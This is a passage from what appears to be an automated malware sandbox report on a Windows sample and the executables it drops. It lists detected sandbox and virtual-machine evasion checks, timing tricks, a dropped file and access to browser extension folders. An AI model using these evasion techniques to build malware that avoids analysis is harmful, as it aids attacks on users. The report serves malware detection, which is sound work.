                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: tijXCZsbGe.exe, 00000001.00000002.719965671.00000000007DB000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Tries to detect virtualization through RDTSC time measurementsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\8783.exeRDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\8783.exeRDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007FB310DB2E74h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007FB310DDF220h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\8783.exeRDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exeRDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exeRDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007FB310DB2E14h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007FB310DDF1C0h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exeRDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifssweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifssweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifssweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifssweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifssweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifssweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\explorer.exe TID: 1548Thread sleep count: 623 > 30
                          Source: C:\Windows\explorer.exe TID: 5420Thread sleep count: 315 > 30
                          Source: C:\Windows\explorer.exe TID: 5420Thread sleep time: -31500s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 4868Thread sleep count: 276 > 30
                          Source: C:\Windows\explorer.exe TID: 6544Thread sleep count: 422 > 30
                          Source: C:\Windows\explorer.exe TID: 6528Thread sleep count: 234 > 30
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe TID: 6128Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6912Thread sleep time: -210000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7124Thread sleep count: 40 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7124Thread sleep time: -40000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe TID: 5808Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe TID: 3492Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 623
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 422
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeAPI coverage: 8.1 %
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeAPI coverage: 6.0 %
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeAPI coverage: 7.3 %
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00406AA0
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C7FA.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: svchost.exe, 0000001C.00000002.825243630.000001C020EF6000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.713141284.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW<
                          Source: explorer.exe, 00000005.00000000.702279429.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAY
                          Source: explorer.exe, 00000005.00000000.695877577.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.713141284.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 0000000F.00000002.804479717.0000000004E25000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.800924790.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.804189922.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.800840679.0000000004E25000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.800707406.0000000004E25000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.824833517.000001C020EA6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.825189731.000001C020EEC000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.707345140.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                          Source: explorer.exe, 00000005.00000000.702098679.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                          Source: svchost.exe, 00000022.00000002.955589491.0000000000C00000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-Cn
                          Source: explorer.exe, 00000005.00000000.702137033.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                          Source: WerFault.exe, 0000000F.00000003.800924790.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.804189922.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWkC!-
                          Source: WerFault.exe, 0000000F.00000003.798946162.0000000004E25000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.798514036.0000000004E28000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: explorer.exe, 00000005.00000000.702098679.000000000A716000.00000004.00000001.sdmpBinary or memory string: -98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&^
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00419BC1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
